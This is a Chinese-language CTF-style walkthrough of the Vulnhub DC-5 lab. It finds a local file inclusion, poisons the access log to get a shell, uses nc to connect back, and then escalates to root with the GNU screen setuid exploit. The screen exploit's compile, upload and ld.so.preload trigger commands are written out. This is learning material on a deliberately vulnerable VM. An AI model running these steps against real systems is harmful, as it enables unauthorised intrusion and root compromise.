Vulnhub 之 DC-5提权

前言

本靶机只做学习使用，不要将其利用于非法途径。

终于来到了倒数第二关，这一关将难度增加，所以我们需要借助搜索工具来帮助我们完成

作者描述

DC-5是另一个专门建造的脆弱实验室，目的是获得渗透测试领域的经验。

这个计划是为了让DC-5更上一层楼，所以这对初学者来说可能不太好，但对有中级或更好经验的人来说应该没问题。时间会证明一切(反馈也会证明)。

据我所知，只有一个可利用的入口点可以进入(也没有SSH)。这个特定的入口点可能很难识别，但它就在那里。你需要寻找一些有点不寻常的东西(随着页面刷新而改变的东西)。这将有希望提供一些关于漏洞可能涉及到什么的想法。

请注意，这里不涉及phpmailer漏洞。:-)

这一挑战的最终目标是找到根，阅读唯一的旗帜。

必须具备Linux技能和熟悉Linux命令行，就像一些基本渗透测试工具的经验一样。

复现环境

kali： 192.168.248.130

DC-5 : 192.168.248.142

开始复现

• 还是老套路扫网段，扫端口。拿到ip：192.168.248.142 开了两个端口：80和111

• 目录遍历

  访问这些网站，试图寻找新的东西
  

• 查看网站

  在concat.php 发现了输入栏

  看到输入框就测测sql注入，xss
  

  发现在url处返回了http://192.168.248.142/thankyou.php?firstname=1&lastname=1&country=other&subject=1

• 文件包含

  发现foster 包含的copyright 20xx 是会变化的

  php在底部调用了footer.php 可能存在本地文件包含，尝试file=xxx测试

  [外链图片转存失败(img-l8LoZf68-1563891649520)(https://raw.githubusercontent.com/ST0new/picture/master/2019/7/23/20190723201552.png)]

• 利用文件包含获取shell

  由于网站会记录url日志，写一句话进去，访问获取shell

访问日志，并执行nc命令，获取到shell

• 借用提权工具

  LinEnum.sh 获取到了提权操作

  发现 guid 处存在可以文件

  搜索发现提权思路

参考：https://www.exploit-db.com/exploits/41154

先编译后上传执行

gcc -fPIC -shared -ldl -o libhax.so libhax.c
gcc -o rootshell rootshell.c

通过wget上传

之后执行

echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 
/tmp/rootshell

查看flag

在root目录下